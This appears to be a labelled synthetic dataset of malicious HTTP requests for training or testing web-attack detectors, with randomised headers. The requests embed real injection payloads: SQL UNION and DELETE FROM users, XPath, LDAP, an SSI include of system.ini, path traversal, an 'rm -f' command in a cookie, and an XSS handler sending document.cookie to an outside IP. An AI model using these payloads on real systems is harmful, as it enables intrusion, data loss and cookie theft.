If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-Range: *
Max-Forwards: 52
Pragma: no-cache
Referer: /ntdp.conf
User-Agent: Mozilla/8.5 (compatible; ncatn; Unix; o0rrEto; cueltivt; so6h)

null

End - Id: 45961
Start - Id: 36683
class: OsCommanding
GET /t21L03UwADg.swf? HTTP/1.1
Host: 147.76.25.41
Connection: NmaIllr
Accept: application/*;q=0.1, image/*
Accept-Charset: windows-1251;q=0.5, iso-8859-15, us-ascii, x-mac-greek, windows-1258
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-age=89153
Client-ip: 212.134.9.77
Cookie: einmnoPr0ap5=rm    -f /tmp/5kxY   |;2Jopen8Taccess_logHZGN=434239
Cookie2: $Version="82"
Date: Sun, 25 Nov 07 02:28:03 UTC
ETag: "wy@OzR52T2wQnQtS"
Expect: 100-continue
From: lilt@OlQ9nomrvy.gov
If-Modified-Since: Sat, 02 Aug 08 11:04:42 UTC
If-Unmodified-Since: Sun, 05 Jul 09 21:07:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 23 Mar 10 15:38:48 UTC
Max-Forwards: 660
Pragma: naTsira='r'
Authorization: Digest nc=fd1AFac9
Range: 54-9,-814311,72-
Referer: http://arie0o.de/indjDoim/eCtelN/lghdl2/umEeoTiq.css
TE: trailers
User-Agent: hie9wan
UA-Disp: 6716,830,16
UA-Pixels: 0658x8272
Via: 0.1 32.210.40.144
Transfer-Encoding: identity
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
X-Forwarded-For: 4.27.255.43
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36683
Start - Id: 49133
class: XPathInjection
GET /Flibh/bnAa/HnA/htIvte/oKy5/kZjXKxcmdr7dmailD/hsEin/ex.jpg?ndatciagpdass=60411&bodymMhR8R11c5g=faawsnep56oPCel&atlTdumaroer=hyi%26++evalo%29acceptne%3E&xYeY=moJ&esso5r8uzeoenn=ge+RoexecbiigvA3%5Bte&amh5t0=ra%2F2mochart%3BNpe%3AetgC%3Anullas&3cymzsv=0+++++or++1%3C+++++eldhl%2Festbh%2Fgt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D621%5D+or++2%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&WjshutdownUxp_=r4gyt2io%280scmdTs HTTP/1.1
Host: 231.91.26.40:80
Connection: ayipewuN
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip, deflate, gzip;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 63.41.96.252
Cookie: 9S@8OFK=p7PN;AbgsoundnQg0A=oissposition t1inq;access_logJOjpEEb=tdUp;aadali1v=ub4e)
Cookie2: $Version="860"
Date: Thu, 25 Mar 10 15:15:14 CET
ETag: "GgpzpScDa_69HXc"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Fri, 11 Jan 08 08:06:02 GMT
If-Unmodified-Since: Wed, 23 Jun 04 17:39:39 UTC
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "2OeEYUsOl3sFDs_H"
If-Range: *
Max-Forwards: 87
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: E11su gdAiio=W96tf0
Authorization: Basic MGVCSWVvUHA6aWhoYWQ=
Range: 6-
Referer: /5cdstap/tswe/ElCI/rsefyhoa.gif
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 8.8; nn-et; rv:8.2.9) Gecko/88264755
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: 8.4 www.qt6itd.htm
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49133
Start - Id: 42683
class: SqlInjection
GET /iN2edrq2drRocecmcs/SstyfU0ala/tsaaneuenodtn/axtefezni4no9b/zZgwVwTBPlqWFm.P/isisen6hsbi.shtml?Vnsnkctje=%27++%29++++UNION++ALL+SELECT+++++0+++FROM+++sm1hn+++WHERE++%28+%27%27+++%3D++%27 HTTP/1.1
Host: www.lsmwktqc.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Encoding: *
Cache-Control: no-store
Expect: 100-continue
If-Unmodified-Since: Sun, 26 Dec 04 04:11:50 CET
Max-Forwards: 1
Authorization: NTLM YWFvU3Nya3RqZXJmZG1Nb0VhZWJhb2VxaWh0aWVlZVM2
Referer: /i5onie.jsp
User-Agent: o3I.7FrGT8 http://www.oena.uk
Via: 6.8 www.ljen.js, 9.1 www.i0re3.css, 0.8 97.1.37.124:6

null

End - Id: 42683
Start - Id: 49816
class: XPathInjection
GET /7Ti/heelrO/eanwa0nti/sr1-Unodep/2eiU/WLzwOjmWY/esMnO/PQw5having9Llhl5/e93FrOm0/e2nrszEendetiNsaat/homeUls.js?aanai4ahuewar=8e+omieSboot.iniq+e%3AeE&wYARtelhtt=aNJrUKRt%400GS&S53uaa=gitdg%27+or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i%2B++++j%2Bk%2B+++l++++%2B1%29%5D++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27bh%27++%3D++%27++hubo%27+++or&isinnrfanj=updateg&sober6ktinohjae=m%3Dn HTTP/1.1
Host: 58.242.0.72
Connection: TrhrfD
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip, identity;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 248.234.57.173
Cookie: eh=iheur;6tpeso9y0Eaapu=9;s6te3c6bUt5t=hnbSs
Cookie2: $Version="04"
Date: Thu, 22 Dec 05 11:49:37 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: ee0n=eems
From: Eyi42tm7@6degzo.st
If-Modified-Since: Wed, 15 Aug 07 18:52:48 CET
If-Unmodified-Since: Sat, 05 Aug 06 13:54:45 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 721
MIME-Version: 3.9
Pragma: 39to='d'
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: tieT iapre=tartt
Range: -786962,-08955,08-
Referer: http://swXh.be/tu4rt/hNin/olecub/didGeaan.avi
TE: trailers
Trailer: Pragma
User-Agent: fsaNxccy (d5N13IlMvf; ewd4zNrto; 2NfUEpNEX)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: 0.4 207.10.177.94, 0.5 156.21.44.89:23020
Transfer-Encoding: gzip
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 144.56.170.95
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49816
Start - Id: 42672
class: SqlInjection
GET /0E65JgFuNPjph.m/o95t/tdtdtgu/aJlwa/autoexecwp-5bzLMV8N4/utflPimtt9Ntearajieh.jpeg?izba=%27+union+++++select++sum%28sutr%29++from+++++irr5-- HTTP/1.1
Host: 74.195.93.116:52
Connection: close
Accept: */*;q=0.5
Accept-Charset: macintosh;q=0.0, x-mac-hebrew;q=0.9, iso-10646-ucs-2;q=0.3, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 39.26.252.173
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="0"
Date: Thu, 07 Jun 07 16:51:49 UTC
ETag: W/"uROPmH-wt_Abq65K3"
Expect: itee
If-Modified-Since: Tue, 02 May 06 17:44:27 CET
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "jULdndvovV6X@mq"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 08
MIME-Version: 1.1
Pragma: ld=oMe
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: Basic bGRuaXNhYVY6cmxUYw==
Range: 73002-0
Referer: http://www.m8h2a.uk/ox4dd/uo4Tota.fgf
TE: trailers,gzip,chunked;q=0.7
Trailer: Accept
User-Agent: PTaiaeeAnx/6.5.7
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: identity
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 398 www.oest9ct.png:70 "Iwcjoteska" "Fri, 08 May 09 18:31:41 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42672
Start - Id: 35241
class: SqlInjection
GET /iz6vXqy/sesm0fjiEceUc/entllhwdrrdzmait/bvjtdo7aehwa/nD/nP@exXl1BU0C/rP-r59AjgIMl/o2ekersr0c6neIt2t/Bspt5eat.shtml?ilniTets5=wt5sp+oeihaa7ei&evaptst=rBj&eS=nze+k&ilhow7ujkqfcgeg=izX&@frd=lieYwce6nsaS0v&bodyagVsi7Ltls.document=ett&coiezpzmfWi3=3f0im4%27+++%29%3BDELETEFROMusersWHEREupper%28username%29++++%3D+++upper%28++%27admin&mipseaeheA=lfj+&1retb3wsl=1AMto&meniaooaAns=91515913&gtbiayea4m=ordat-sb%291s02t&RPUGBe=s4ShlC2&mnitQna8mydrk=5078815459 HTTP/1.1
Host: 150.211.243.221
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.1, hz-gb-2312, euc-tw, big5;q=0.9, euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: a=cxj
Client-ip: 61.19.198.20
Cookie: irhwhsou7x=eVnkl;anwsns=s4e;rwougk4Fiie=diia;MsgP=f 3group byc7zxfn7itee:s;swh8ht=28760;2o=nes
Cookie2: $Version="78"
Date: Mon, 28 May 07 23:46:43 UTC
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: gntsv@tqrstsoo.be
If-Modified-Since: Sat, 08 Jan 05 11:57:59 CET
If-Unmodified-Since: Tue, 25 Nov 08 14:30:54 UTC
If-Match: "SGWy4MktgqP7HNVEGrfk"
If-None-Match: "0akWzDz6MsQheKhu"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 717
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Digest realm
Range: 233007-
Referer: /ecgD/idsrj.gz
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: 8f77Kieted0r
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: HTTP/4.5 103.188.40.183, FTP/6.5 253.143.108.102
Transfer-Encoding: compress
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 99658845770
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35241
Start - Id: 38986
class: LdapInjection
GET /XOQOVHFEdVUt/hBjgNFRW_1drkMkq/nhln6tfa/isH/rw1S@BkKV@-hT66EgG/t-/tV/inlrFCtImdnirhm/Ccie6o/dbnmodqzddst1i/4H69pggiJoU2Ry.html?dea=dssswnts&8o1yapa3mvncw=%2Bn%7CE&esubs=%5C4&dSgenebnhRhar=%29+++%28+++%7C++++%28displayName%3Dhad*%29++++%28name++++%3D+++had*%29%28+mail%3Dhad*%29&eajhJaqiAnm=nP4T4&s6F-Zj=esoEE8tnisdi&zao4rsG=zap%3Btd%2BrcDbt&eie5atUiwfa=30988&Ied=r4Hv&o0IesrsEynyme=0ax%3DPn++o&ed=inihsnhu HTTP/1.0
Host: www.rnbu.st:80
Connection: keep-alive
Accept: video/*;q=0.5, video/quicktime;q=0.3, text/xml;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: e-xlAny, 1chEe-emX;q=0.2, lemdcir-3esm;q=0.9, ryoytN-tdh1reus, uath6xoE-Oaahd
Cache-Control: min-fresh=71867
Client-ip: 21.1.182.109
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Fri, 13 Nov 09 09:16:57 UTC
ETag: W/"HJ3W6ctq6S95b2ZaHN"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: "2FyrxKtO5E7Cq7C"
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 765
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: NTLM c2VhZU9lZGVBa2VpZHJyb2w2bDFlSWdOMWVpdHRldGNmbm1OZw==
Range: 2-,-247703
Referer: /y768a31/nage3it/rdegSe.png
TE: deflate
Trailer: Date
User-Agent: Mozilla/8.6 (X11; U; Open BSD i386 1.3; we-o9; rv:6.4.2) Gecko/18315957
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: 1.6 www.klrgtn.png:3
Transfer-Encoding: deflate
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38986
Start - Id: 40675
class: SSI
GET /mincludeRQS/eHXzVTELX34z/c2/3PSGk/lzIfnfM@b/sdtmhqdedv6tu/tytafxEerugnirde/8Y0qJ4ButF/e1E4dbDqYgbWT_FQgb4j.bin?msxeuNoRb2ttse=geautoexecolEdelete%3F&rtkoNe=armands3&hotOneeelmnlhw=85&nunaa=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&osh4i=nputwinntom9&skRIxn=htacces%2B%3Be&BxqD.b=m0-fg0%40Ov8NA&toeIlLA4itse=wrnloLo6iYnhrwroah&sno=i87fKK6cVHI8 HTTP/1.0
Host: 4.159.123.102
Connection: aehmoe
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.0, isiri-3342;q=0.1, iso-8859-1;q=0.0, macintosh, windows-874
Accept-Encoding: 
Accept-Language: faee9-eE;q=0.0, c6eiueK-benOVe, sndEe-sennlxs;q=0.3
Cache-Control: no-transform
Client-ip: 126.162.7.249
Date: Mon, 06 Feb 06 24:44:37 CET
ETag: "zb.mz_qERALUPB_zKO"
If-Modified-Since: Tue, 13 Feb 07 21:11:53 CET
If-Unmodified-Since: Mon, 04 Apr 05 23:34:16 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: *
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: aarero jcnAnfs=oeeeerrY
Authorization: OioeVe ronfee=yoict
Range: -41940,-0
Referer: http://ytw7emhe.it/solc/ocsdm/itoltp/aa7ca7x/acpe9jt.dll
TE: chunked,chunked;q=0.3
User-Agent: unnsiszmge (dLjMuOZ; a@uYdo; ieIRvz; tFC6E9; 12pZNYU)
UA-CPU: PowerPC
Transfer-Encoding: compress
X-Serial-Number: 017478485639
----: ---------------------

null

End - Id: 40675
Start - Id: 45143
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.Dateitcrhl.st:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: aen='sqinh'
Client-ip: 231.243.192.196
Cookie: f6na1hsEsC=0411822;gid3rli5=wo
Cookie2: $Version="158"
Date: Tue, 13 Sep 05 21:15:22 GMT
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Fri, 18 Jul 08 15:09:24 CET
If-Match: "wYDgoW2IEMcFWQ5Yn"
If-None-Match: *
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 3605
Proxy-Authorization: Basic aHRheTpyaWlo
Authorization: NTLM ZTl5ZWluaGJpdHI4ZXMwdG5keXRlYWF0dHRvNWVld25sZHozbA==
Referer: http://sisn.cz/eoeoh/detaLwj.js
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.8 (compatible; MSIE 5.1; Linux i586; eiiOOmfUa)
Via: HTTP/3.4 www.udeee.js, 3.0 www.eartphlt.html:68511
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 189.98.19.155
----: ----------------------------

null

End - Id: 45143
Start - Id: 47071
class: XSS
GET /rR/eethlclTptmdhnmqs/eweciriAred/aGB2bG.@0WNCv0eYN1J/r-/efd.YVGEFNqd@gb4y/sGwAi6se6naewhb/fpas8/cDtaqvSpuE-ewi/SQwa47Wyekmocha59e8/9kisSvigCpoWYO/tvpbFqxxhcaf4VK.ZauX.php4?cTRn=16&FFp60ue=061&p7xoiond=li%3AF&tmUu=io&s7=6a+a1e+%26AeOgafirh&D9mgrnx4jly=ts%3Eeb&7EhttpsdocumentH=oEsa&4t1a=9112105&jfv@JJofGl1=%24%2F%5Bio%7Ecek&jmu1suwg=2134856&Eaui=itqsn&ofqkeiwao=%3Cdiv+++++onmouseover+%3D+++%22+%5Bwindow.open%28%27http%3A%2F%2F17.130.182.222%2Fattrar.sh%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&wMEu0dtul=79275617&n7eIxretsntno=769120&ssaozhorhalddu9=s%28d+ HTTP/1.0
Host: www.m1tf4eqaa.st
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.4, x-mac-hebrew
Accept-Encoding: compress;q=0.2
Accept-Language: rsAba9cm-Gr, t-sassw1h
Cache-Control: only-if-cached
Client-ip: 217.116.65.138
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="13"
Date: Sat, 20 Feb 10 08:59:49 CET
ETag: W/"sdelRvzyys61VAh"
Expect: yshaae=hl6e2eC
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Tue, 26 Dec 06 20:39:15 UTC
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: "s3IjE_BSN5P4UBme"
If-None-Match: ".xfPb2D-HwsUKLI@nO-0"
If-Range: *
Max-Forwards: 76
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Uo2r1D iscanya=cxcext
Range: 44535-
Referer: /lene/odaUnd/dsPsoeeR/sor7/le4Te.mspx
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: nlrhhmhf/1.3.0
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: HTTP/2.6 83.10.245.89, deeh/2.0 www.65ii.gif
Transfer-Encoding: Ohnf
Upgrade: cei/0.7
Warning: 844 63.32.200.155 "u8ouwTturkm44sneT7" "Tue, 11 Apr 06 02:02:13 GMT"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47071
Start - Id: 35144
class: SqlInjection
PUT /0A/n2W.BV/n3Praein/8IhNn3Jn/81eCrh3etSslmia/eyVttMPaLWFke0fKkPj/sNytytmh/vk5vQ7ETb4ik4n5L./tautu/wV_@LAXAns/uhn/tyaP.css? HTTP/1.0
Content-Length: 211
Content-Language: aabq,nmcw
Content-Encoding: deflate
Content-Location: http://www.wSnarta1.st/tt4n8/6rsolhsi/Ndbq/Eioierht/tdsuqsnl.tiff
Content-MD5: MjhzdnRNdWVpZ3JyeWxOaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Oct 05 23:49:39 CET
Last-Modified: Tue, 07 Jun 05 07:18:44 CET
Host: www.enCyA.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-7, windows-1255
Accept-Encoding: *;q=0.3
Accept-Language: ntjEh0c-riel;q=0.1
Cache-Control: max-age=1
Client-ip: 104.27.173.11
Cookie: ptsEdzns5pc=526149
Cookie2: $Version="374"
Date: Tue, 16 Mar 10 11:14:31 GMT
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Mon, 09 May 05 18:19:01 UTC
If-Match: "V@5-SiSROLbdAeh53"
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 22 Jun 04 10:44:19 UTC
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM bGFlM0hpYnN0Ymlkb3AzaDFlb2lvZnVjcm5Tbmxyc2FoYTZkbQ==
Range: 63-383,700-,-5
Referer: /ryC88I/letO.asmx
TE: trailers
User-Agent: fwsu/8.4
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 1.6 www.itil1zae.png
Transfer-Encoding: identity
Upgrade: pt5etn/1.8, Epd/4.6, nuba/1.0, kixdml/0.4, fecwi/7.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

visbS0i=$onetcat&snrTm8oj4tvHsM='select   customer_phone    '||'from    customers '||'where    customer_surname='''||     lv_surname||''' and     customer_type=1';

End - Id: 35144
Start - Id: 41272
class: SqlInjection
GET /sNbALbwUDiF5f/p-DAdeletebtelnetTP/am/umlio/gn/-4/sFyW8I.cl6yjkjJPIvX1.asmx?ohnS=uUfxW8UeZiHc&tnoo3bht=845875150&0psmaoese=4658&cup3EQ6=703978&rhwyzctlitrsth=i1y0_M-3 HTTP/1.0
Host: www.dNfuruugg.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.6, windows-1257
Accept-Encoding: compress;q=0.9
Accept-Language: 2sr-cwt6beit, o-7f;q=0.0
Cache-Control: only-if-cached
Client-ip: 222.69.243.247
Cookie: vrrrt='     OR 'ggx1i'    =     'y01'+'bprtt8';bdsiet3lteto=4cyMiitwgetoG;gefgsee=pY.SrQ3;nasayim=i=ayot8rwgeta
Cookie2: $Version="40"
Date: Thu, 02 Aug 07 08:06:01 CET
ETag: W/"o-Hh0hmT.hxeVMlHMD"
Expect: 100-continue
From: eo7Ttna@e3k5cwi.biz
If-Modified-Since: Sat, 19 Feb 05 08:54:50 CET
If-Unmodified-Since: Mon, 21 Apr 08 05:20:29 GMT
If-Match: "oZ7-57UA1lyA2R."
If-None-Match: "@66_4LzqHAFcSk5tusan"
If-Range: Wed, 28 Oct 09 15:55:17 CET
Max-Forwards: 2591
MIME-Version: 2.7
Pragma: wono=fd0mc
Proxy-Authorization: Basic ZUVpczphMjFlZThFMw==
Authorization: NTLM dWE2b2hhYWtpbGt3bGVyZWFuczFlMGh3ZU5wYmdodmVrYQ==
Range: -5,050699-49322,064735-40
Referer: /3axsotau/aversHn/eaeKp/kejie/n1qeocsm.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (compatible; Konqueror/1.1; Win 9x; aolbjea; IYIrIlr)
UA-Disp: 189,7567,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8605x333
Via: 0.1 236.240.95.131:4045, HTTP/6.6 www.s8es.shtml, 8.4 www.rpxnra9r.htm
Transfer-Encoding: compress
Upgrade: nstget/4.5, oth/2.2
Warning: 898 182.226.132.175:4 "domyntnlr2rg2s" "Wed, 18 Mar 09 18:27:27 CET"
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 40502519825316618306
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41272
Start - Id: 35624
class: XPathInjection
GET /aiHeWgjusenoethtppe/rNX4puPIcrW-V6JB-P0/inHT4oycqsamS/iTC3KL.php4?6ns=usrs%2Bi&fpyo6imEirnb=+idrg&vi=+GNuar&6bsthDseJAdgr=o2esaa1zn2d1&etfcuorletsmmd=0906190&plgiDTC=eo25N6%2Fji2k1%2Fnektll%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D7%5D+++%7C+++++Ezt%2FoTe%2Ftndw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D++++or+++++%274aD%27+++%3D++++%27&n5m2ltnaaeso=%5Cuut HTTP/1.0
Host: 43.106.45.44:80
Connection: i5sM
Accept: */*;q=0.5
Accept-Charset: x-mac-greek, x-mac-korean, x-mac-japanese;q=0.0, x-mac-hebrew;q=0.1
Accept-Encoding: compress;q=0.1, compress;q=0.2, identity, identity, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 254.148.190.50
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Sat, 02 Dec 06 12:14:39 CET
ETag: W/"xTHpvz5ahfoa5jv_KuRj"
Expect: arecso=imaEbd
From: xrco@ssnn.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Wed, 02 Jul 08 18:01:30 GMT
If-Match: "U-Ntndda.Irh0gL90"
If-None-Match: *
If-Range: "8yVtEN5.enmBAddtE"
Max-Forwards: 8
MIME-Version: 3.8
Pragma: 1de='dfdiag'
Proxy-Authorization: Digest nc=0944EBDa
Authorization: NTLM ZU9nYm9zdGUwdU1ib2VldG1yb2RpaWRkQ2RnZGxyTGlmdHJOQmFzdG50
Range: 7528-,849-
Referer: /5nsslvr/nepigc/vppakD/rE2iart.swf
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: jvyoeEt (tkipTlb; a7bga-6P; sEf31sN; l_SlU-N3z)
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 7.4 4.92.172.173:6109
Transfer-Encoding: cpOn
Upgrade: sivn/3.0
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35624
Start - Id: 48733
class: XPathInjection
GET /42PRIe/mDC8Vc/tklpzX/XdlLIx_Fhttps0Rdocumentc/yZZMVMt/eo7Eh27NCe0_Uqwui/2osnnet3rnh5s.asmx?ereeneni8e=m4+&r5p3osnnfcant=+a6apstyledhnodLhe%3De&sxaioarmeru=tEZyx&replaceb3FynfBkPZn=gGgKw8&e3y5vaossraeenj=eG%40&.G24MKz2=38289+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++0154%3D&L2pDEk-PkF=n9sl4&woyj0t9nalj=pesol5iau7ia1&Ieiaeqk=48si%3B&lbyf6oa0Tne=b+erlnq&pstpeptoef=sPgmvLWV&Luudemerpsimi=%28Etmn%7C&eH4=Idgfhob HTTP/1.0
Host: 235.154.203.153
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tcn8Zil-edtrhc;q=0.0, eweeler-wteId;q=0.6
Cache-Control: e='L1n'
Client-ip: 219.77.148.199
Cookie: fromndocumentUnwindow.openY4xGO=173832;teloz=a6c;psloat1sscb=utp=1idli2;giuequrctrs=ce?or
Cookie2: $Version="582"
Date: Fri, 13 Apr 07 07:34:33 GMT
ETag: "BNYgiCLjg9lbGVfj_6"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Wed, 26 Dec 07 19:20:51 GMT
If-Unmodified-Since: Mon, 07 Aug 06 02:12:24 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: Tue, 20 Mar 07 23:05:13 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: dPAmoSs=4eiitot
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM amVWcWFiMnNwcTM5b25obkhwT3RxdGhhZXkxdEV0RXI0U21OU0VsazVldG1jMw==
Range: 328-,-79624
Referer: /b5i2/pekkNsxa.asp
TE: deflate;q=0.8,deflate
Trailer: Upgrade
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 2.0; ei-io; rv:9.1.6) Gecko/03949414
UA-CPU: Sparc
UA-Disp: 383,7036,16
